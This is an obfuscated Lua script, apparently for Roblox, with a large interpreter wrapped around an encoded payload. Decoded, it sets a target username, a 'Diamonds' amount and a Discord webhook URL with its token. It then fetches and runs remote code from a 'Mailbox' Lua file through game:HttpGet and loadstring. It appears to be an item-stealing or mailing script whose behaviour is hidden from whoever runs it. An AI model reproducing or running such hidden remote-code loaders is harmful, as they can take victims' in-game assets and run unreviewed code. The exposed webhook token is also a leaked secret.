--[[

 .____                  ________ ___.    _____                           __                

 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 

 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \

 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/

 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   

         \/          \/         \/    \/                \/     \/     \/                   

          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v83=v2(v0(v30,16));if v19 then local v90=v5(v83,v19);v19=nil;return v90;else return v83;end end end);local function v20(v31,v32,v33)if v33 then local v84=(v31/((879 -(282 + 595))^(v32-(2 -1))))%((5 -3)^(((v33-(1 -(1637 -(1523 + 114)))) -(v32-(2 -1))) + 1)) ;return v84-(v84%(620 -(555 + 11 + 53))) ;else local v85=((839 + 94) -(857 + 74))^(v32-((810 -241) -(367 + 201))) ;return (((v31%(v85 + v85))>=v85) and (928 -(214 + 713))) or (0 + 0) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=1065 -(68 + 997) ;local v36;local v37;while true do if (v35==(1271 -((538 -312) + 1044))) then return (v37 * (1114 -858)) + v36 ;end if (v35==(117 -(32 + 85))) then v36,v37=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 1 + 1 ;v35=958 -(892 + (120 -55)) ;end end end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (4 -(2 -1)) );v18=v18 + (354 -(87 + 263)) ;return (v41 * 16777216) + (v40 * (65716 -(67 + 113))) + (v39 * (188 + 68)) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=1 + 0 ;local v45=(v20(v43,1,79 -59 ) * ((20 -(10 + 8))^(122 -90))) + v42 ;local v46=v20(v43,973 -(802 + 150) ,83 -(216 -164) );local v47=((v20(v43,57 -25 )==(1 + 0)) and  -(998 -(915 + 82))) or (2 -1) ;if (v46==(0 + 0)) then if (v45==0) then return v47 * (0 -0) ;else v46=1;v44=(697 + 490) -(1069 + 118) ;end elseif (v46==(4643 -2596)) then return ((v45==((0 -0) + 0)) and (v47 * ((1 -0)/(0 + 0)))) or (v47 * NaN) ;end return v8(v47,v46-(1817 -794) ) * (v44 + (v45/((2 + 0)^(1190 -((411 -295) + 1022))))) ;end local function v25(v48)local v49;if  not v48 then local v86=859 -(814 + 45) ;while true do if (v86==(0 -0)) then v48=v23();if (v48==(0 + 0)) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -1 );v18=v18 + v48 ;local v50={};for v67=1 + (885 -(261 + 624)) , #v49 do v50[v67]=v2(v1(v3(v49,v67,v67)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=1171 -(418 + 753) ;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v51~=(1 + 1)) then else v56=nil;v57=nil;v51=1 + 2 ;end if (v51==4) then v60=nil;while true do if (v52==1) then local v95=0 + 0 ;while true do if (v95~=1) then else v52=1 + 1 ;break;end if ((529 -(406 + 123))~=v95) then else v55=nil;v56=nil;v95=1;end end end if (v52~=0) then else v53=1769 -(1749 + 20) ;v54=nil;v52=1 + 0 ;end if (v52==(1324 -(1249 + 73))) then v57=nil;v58=nil;v52=2 + 1 ;end if (v52==(1149 -(466 + 679))) then while true do if (v53==(0 -0)) then local v119=0 -0 ;while true do if (v119==(1900 -(106 + 1794))) then v54=0;v55=nil;v119=1;end if (v119==1) then v53=1;break;end end end if (v53==3) then v60=nil;while true do local v123=0;local v124;while true do if (0==v123) then v124=0;while true do if (v124==(1 + 0)) then if (v54~=(0 + 0)) then else local v144=0;while true do if (v144~=2) then else v54=1;break;end if (v144~=0) then else local v145=0 -0 ;local v146;while true do if ((0 -0)~=v145) then else v146=114 -(4 + 110) ;while true do if (v146~=(585 -(57 + 527))) then else v144=1;break;end if (v146~=(1427 -(41 + 1386))) then else local v154=103 -(17 + 86) ;while true do if (v154~=(1 + 0)) then else v146=1 -0 ;break;end if (0==v154) then v55={};v56={};v154=1;end end end end break;end end end if (v144==(2 -1)) then local v147=0;while true do if (v147~=(166 -(122 + 44))) then else v57={};v58={v55,v56,nil,v57};v147=1 + 0 ;end if (v147~=(1 -0)) then else v144=67 -(30 + 35) ;break;end end end end end break;end if (0==v124) then local v143=0;while true do if (v143~=1) then else v124=1;break;end if (v143==(0 + 0)) then if (v54~=(1258 -(1043 + 214))) then else local v148=0 -0 ;local v149;while true do if (v148==0) then v149=1212 -(323 + 889) ;while true do if (v149~=(5 -3)) then else v54=2;break;end if (1~=v149) then else local v155=580 -(361 + 219) ;while true do if (v155==1) then v149=2;break;end if (v155==(320 -(53 + 267))) then local v156=0 + 0 ;while true do if (v156~=0) then else for v160=414 -(15 + 398) ,v59 do local v161=0;local v162;local v163;local v164;while true do if (v161~=(983 -(18 + 964))) then else v164=nil;while true do if (v162==0) then local v165=0 -0 ;local v166;while true do if (v165==0) then v166=0 + 0 ;while true do if (v166==1) then v162=1 + 0 ;break;end if (v166==0) then local v175=850 -(20 + 830) ;while true do if (v175~=(0 + 0)) then else v163=v21();v164=nil;v175=127 -(116 + 10) ;end if (v175==(1 + 0)) then v166=739 -(542 + 196) ;break;end end end end break;end end end if (v162~=(1 -0)) then else if (v163==(1 + 0)) then v164=v21()~=0 ;elseif (v163==2) then v164=v24();elseif (v163~=(2 + 1)) then else v164=v25();end v60[v160]=v164;break;end end break;end if (v161==0) then v162=0;v163=nil;v161=1 + 0 ;end end end v58[3]=v21();v156=2 -1 ;end if (v156==(2 -1)) then v155=1552 -(1126 + 425) ;break;end end end end end if (v149==0) then v59=v23();v60={};v149=406 -(118 + 287) ;end end break;end end end if ((7 -5)~=v54) then else local v150=1121 -(118 + 1003) ;local v151;while true do if (v150==(0 -0)) then v151=0;while true do local v152=377 -(142 + 235) ;local v153;while true do if ((0 -0)~=v152) then else v153=0 + 0 ;while true do if (v153~=(977 -(553 + 424))) then else if (v151==0) then local v158=0 -0 ;local v159;while true do if (v158==0) then v159=0 + 0 ;while true do if (v159==1) then v151=1;break;end if ((0 + 0)==v159) then for v168=1,v23() do local v169=0 + 0 ;local v170;local v171;local v172;while true do if ((0 + 0)~=v169) then else v170=0 + 0 ;v171=nil;v169=2 -1 ;end if (v169~=(2 -1)) then else v172=nil;while true do if (v170~=(2 -1)) then else while true do if (v171==0) then v172=v21();if (v20(v172,1 + 0 ,4 -3 )==(753 -(239 + 514))) then local v177=0 + 0 ;local v178;local v179;local v180;local v181;local v182;while true do if (v177==2) then v182=nil;while true do if (v178==2) then while true do if (v179==3) then if (v20(v181,3,1332 -(797 + 532) )~=1) then else v182[3 + 1 ]=v60[v182[2 + 2 ]];end v55[v168]=v182;break;end if (v179==(2 -1)) then local v186=0;local v187;while true do if (v186==(1202 -(373 + 829))) then v187=0;while true do if ((731 -(476 + 255))==v187) then v182={v22(),v22(),nil,nil};if (v180==(0 -0)) then local v196=0;local v197;while true do if (v196~=(0 -0)) then else v197=0;while true do if (v197==0) then v182[241 -(64 + 174) ]=v22();v182[1 + 3 ]=v22();break;end end break;end end elseif (v180==1) then v182[3 -0 ]=v23();elseif (v180==2) then v182[3]=v23() -(2^16) ;elseif (v180~=3) then else local v206=336 -(144 + 192) ;local v207;local v208;while true do if (v206~=1) then else while true do if (v207~=(216 -(42 + 174))) then else v208=0;while true do if (v208==(0 + 0)) then v182[3 + 0 ]=v23() -((1 + 1)^16) ;v182[4]=v22();break;end end break;end end break;end if (v206~=(1504 -(363 + 1141))) then else v207=1580 -(1183 + 397) ;v208=nil;v206=1;end end end v187=1;end if ((2 -1)==v187) then v179=2;break;end end break;end end end if (v179==(2 + 0)) then local v188=0 + 0 ;local v189;while true do if (v188~=0) then else v189=0;while true do if (1==v189) then v179=3;break;end if (v189~=(1975 -(1913 + 62))) then else if (v20(v181,1 + 0 ,1)~=(2 -1)) then else v182[1935 -(565 + 1368) ]=v60[v182[2]];end if (v20(v181,2,2)~=(3 -2)) then else v182[1664 -(1477 + 184) ]=v60[v182[3]];end v189=1;end end break;end end end if (v179~=0) then else local v190=0 -0 ;local v191;while true do if (v190~=(0 + 0)) then else v191=856 -(564 + 292) ;while true do if (1~=v191) then else v179=1;break;end if (0~=v191) then else local v194=0;local v195;while true do if (v194~=(0 -0)) then else v195=0 -0 ;while true do if ((305 -(244 + 60))~=v195) then else v191=1;break;end if (0==v195) then v180=v20(v172,2,3);v181=v20(v172,4,5 + 1 );v195=1;end end break;end end end end break;end end end end break;end if (v178~=(476 -(41 + 435))) then else local v183=1001 -(938 + 63) ;while true do if (v183~=(0 + 0)) then else v179=0;v180=nil;v183=1;end if (v183~=(1126 -(936 + 189))) then else v178=1 + 0 ;break;end end end if ((1614 -(1565 + 48))==v178) then local v184=0 + 0 ;while true do if (v184~=(1138 -(782 + 356))) then else v181=nil;v182=nil;v184=1;end if (v184==(268 -(176 + 91))) then v178=4 -2 ;break;end end end end break;end if (v177==(0 -0)) then v178=1092 -(975 + 117) ;v179=nil;v177=1876 -(157 + 1718) ;end if (v177==(1 + 0)) then v180=nil;v181=nil;v177=2;end end end break;end end break;end if (v170~=0) then else local v176=0;while true do if (v176==(0 -0)) then v171=0 -0 ;v172=nil;v176=1;end if (v176~=(1019 -(697 + 321))) then else v170=2 -1 ;break;end end end end break;end end end for v173=1,v23() do v56[v173-1 ]=v28();end v159=1 -0 ;end end break;end end end if (1==v151) then return v58;end break;end end break;end end end break;end end end v143=1;end end end end break;end end end break;end if (v53~=(4 -2)) then else local v120=0 + 0 ;local v121;while true do if (v120~=0) then else v121=0 -0 ;while true do if (v121~=0) then else v58=nil;v59=nil;v121=1;end if (v121~=1) then else v53=3;break;end end break;end end end if (v53==(2 -1)) then local v122=0;while true do if (0~=v122) then else v56=nil;v57=nil;v122=1;end if (v122==(1228 -(322 + 905))) then v53=2;break;end end end end break;end if (v52==(614 -(602 + 9))) then local v96=0;while true do if (v96==0) then v59=nil;v60=nil;v96=1190 -(449 + 740) ;end if (v96~=1) then else v52=876 -(826 + 46) ;break;end end end end break;end if (1==v51) then v54=nil;v55=nil;v51=2;end if (v51==(950 -(245 + 702))) then v58=nil;v59=nil;v51=4;end if (v51~=0) then else v52=0 -0 ;v53=nil;v51=1;end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v69=v64;local v70=v65;local v71=v66;local v72=v27;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v87=0,v77 do if (v87>=v71) then v75[v87-v71 ]=v76[v87 + 1 ];else v79[v87]=v76[v87 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do v81=v69[v73];v82=v81[1];if (v82<=3) then if (v82<=1) then if (v82==0) then v79[v81[2]]();else v79[v81[2]]=v81[3];end elseif (v82>2) then v79[v81[2]][v81[3]]=v81[4];else do return;end end elseif (v82<=5) then if (v82>4) then local v101;local v102;v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]][v81[3]]=v81[4];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]][v81[3]]=v81[4];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]][v81[3]]=v81[4];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v102=v81[2];v101=v79[v81[3]];v79[v102 + 1 ]=v101;v79[v102]=v101[v81[4]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];else v79[v81[2]]=v63[v81[3]];end elseif (v82<=6) then local v116=0;local v117;local v118;while true do if (1==v116) then v79[v117 + 1 ]=v118;v79[v117]=v118[v81[4]];break;end if (v116==0) then v117=v81[2];v118=v79[v81[3]];v116=1;end end elseif (v82>7) then local v125=0;local v126;local v127;local v128;local v129;while true do if (v125==1) then v74=(v128 + v126) -1 ;v129=0;v125=2;end if (v125==0) then v126=v81[2];v127,v128=v72(v79[v126](v13(v79,v126 + 1 ,v81[3])));v125=1;end if (v125==2) then for v140=v126,v74 do v129=v129 + 1 ;v79[v140]=v127[v129];end break;end end else local v130=0;local v131;while true do if (0==v130) then v131=v81[2];v79[v131]=v79[v131](v13(v79,v131 + 1 ,v74));break;end end end v73=v73 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0B3O0003023O005F4703083O00557365726E616D65030C3O00496C6F7665737465616B323903083O004469616D6F6E6473025O006AE84003073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F313039383138343135333533323436353138322F4879447A47494E544D694A3172336754724F65676B34456136685263684E646D555736446D384763654371756D6F4C696E5A4972447942674F4739553776394E43453947030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403313O00682O7470733A2O2F61726B68616C69736C75612E6769746875622E696F2F41726B68616C69734D61696C626F782E6C7561000E3O0012053O00013O00304O0002000300124O00013O00304O0004000500124O00013O00304O0006000700124O00083O00122O000100093O00202O00010001000A00122O0003000B4O0008000100034O00075O00026O000100012O00023O00017O00",v9(),...);end
